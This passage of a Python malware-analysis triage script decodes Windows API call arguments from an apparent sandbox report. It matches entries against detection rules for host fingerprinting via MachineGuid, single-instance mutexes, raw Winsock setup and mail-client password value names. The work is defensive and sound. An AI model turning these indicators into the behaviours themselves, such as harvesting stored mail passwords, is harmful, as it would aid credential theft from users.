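        return f"RegOpenKeyExA samDesired={decode_flags(hexarg(3), SAM_FLAGS)}"
    if api == "SetErrorMode" and hexarg(0) is not None:    # uMode
        return f"SetErrorMode {decode_flags(hexarg(0), ERRMODE_FLAGS)}"
    if api == "WSAStartup" and hexarg(0) is not None:      # wVersionRequested, major in the low byte
        return f"WSAStartup Winsock {hexarg(0) & 0xFF}.{hexarg(0) >> 8}"
    if api == "recv" and hexarg(2) is not None:            # len
        return f"recv up to {hexarg(2)} bytes"
    return api

# (label, APIs that must all occur in the entry, token that must occur among its args or strings)
RULES = [
    ("reads MachineGuid from the registry (host fingerprint)", {"RegOpenKeyExA", "RegQueryValueExA"}, "MachineGuid"),
    ("named mutex followed by GetLastError (single-instance marker)", {"CreateMutexW", "GetLastError"}, None),
    ("raw Winsock client setup", {"getaddrinfo", "socket"}, None),
    ("mail client account/password value names", set(), "PopPassword"),
]

def match_rules(entries):
    hits = []
    for idx, entry in enumerate(entries):
        apis = {c["api"] for c in entry["calls"]}
        tokens = [a for c in entry["calls"] for a in c["args"]] + entry["strings"]
        for label, needed, marker in RULES:
            if needed <= apis and (marker is None or marker in tokens):
                hits.append((idx, label))
    return hits

def triage(text):
    """Return (entries, decoded call descriptions per entry, rule hits)."""
    entries = parse_entries(text)
    return entries, [[describe(c) for c in e["calls"]] for e in entries], match_rules(entries)

if __name__ == "__main__":
    _, decoded, hits = triage(SAMPLE)
    print(*("; ".join(d) for d in decoded), sep="\n")
    print(*(f"entry {i}: {label}" for i, label in hits), sep="\n")
```

Run against the sample, the RegOpenKeyExA samDesired 0x20119 decodes to KEY_READ|KEY_WOW64_64KEY (a 32-bit process deliberately reading the 64-bit view of the key), SetErrorMode 0x3 to SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX, WSAStartup 0x0202 to Winsock 2.2 and the recv length 0xFD0 to 4048 bytes; the rules match the mutex entry, the MachineGuid entry, the getaddrinfo/socket entry and the mail-credential string entry. Arguments shown as "?" in the report are kept as opaque tokens and never decoded.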